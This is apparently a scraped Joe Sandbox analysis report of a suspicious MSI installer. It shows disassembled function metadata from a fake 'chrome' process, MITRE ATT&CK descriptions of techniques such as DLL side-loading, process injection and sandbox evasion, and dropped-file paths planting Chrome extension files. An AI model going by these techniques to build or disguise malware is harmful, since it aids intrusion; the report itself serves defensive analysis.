Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: 5a0bf3edfb930e611b529724e56632e9bc9272be2979e83de85f8da9e4100777
Instruction ID: 6a74d00c4f82a86a1c56f527d22d2dc4d3726f9016a035ff781a7e7008a4403f
Opcode Fuzzy Hash: 5a0bf3edfb930e611b529724e56632e9bc9272be2979e83de85f8da9e4100777
Instruction Fuzzy Hash: E001E935E0DA2785EE25BB29A4553792361AF46F80F544435E90E867F0EF7DAC86A300

Function 00007FF64568FCB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,00007FF6457294C3,?,?,?,00000000,00007FF645681EA3), ref: 00007FF64568FD02
GetProcAddress.KERNEL32(?,?,?,?,00007FF6457294C3,?,?,?,00000000,00007FF645681EA3), ref: 00007FF64568FD12

Strings

GetHandleVerifier, xrefs: 00007FF64568FD08

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: d1f4715f804becae9059b92a00ee1cb28af3340a212d3e92cb0725ac72e9c449
Instruction ID: 20a7507e5ac5a7f08ce5f3aed121c40f82fcc9908955e9fd365206fc6724e51a
Opcode Fuzzy Hash: d1f4715f804becae9059b92a00ee1cb28af3340a212d3e92cb0725ac72e9c449
Instruction Fuzzy Hash: C1112D20E0EA1782EA29BB26F4953795351AF46F80F54443ACA0E827F0DF7CEC46A301

Function 00007FF6457E96B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF6457E96F9

Strings

bad_variant_access.cc, xrefs: 00007FF6457E96B4
Bad variant access, xrefs: 00007FF6457E96BB

Memory Dump Source

Source File: 00000007.00000002.2878693461.00007FF645681000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF645680000, based on PE: true

Associated: 00000007.00000002.2878674793.00007FF645680000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878865074.00007FF6458B1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458B2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878889514.00007FF6458BF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878934706.00007FF6458C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878955521.00007FF6458CB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878978269.00007FF6458DF000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2878996875.00007FF6458E0000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2879015485.00007FF6458E1000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff645680000_chrome.jbxd

Similarity

API ID: __std_exception_destroy
String ID: Bad variant access$bad_variant_access.cc
API String ID: 2453523683-4004146108
Opcode ID: 7346b80b12a5e2d697a81cb705a21295759d987beacbef3e8922195e1ff3f804
Instruction ID: 607b9f1346b6f2b202fd5331159e89b8aadc1ab4b958363129de9ce6f401a275
Opcode Fuzzy Hash: 7346b80b12a5e2d697a81cb705a21295759d987beacbef3e8922195e1ff3f804
Instruction Fuzzy Hash: 81E06823F1D62691FA09BF2AAC502F821108F84F94F804031CD0C477A1EE3CEE478305

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: Ingress Tool Transfer ) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Deletion
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ust_019821730-0576383.msi

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Other

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Config.Msi\67df31.rbs

C:\ProgramData\Chrome\Application\118.0.5993.120\124.0.6367.119.manifest

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.1

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.10

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.100

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.101

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.102

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.103

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.104

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.105

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.106

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.107

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.108

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.109

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.11

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.110

C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.111

Windows Analysis Report
ust_019821730-0576383.msi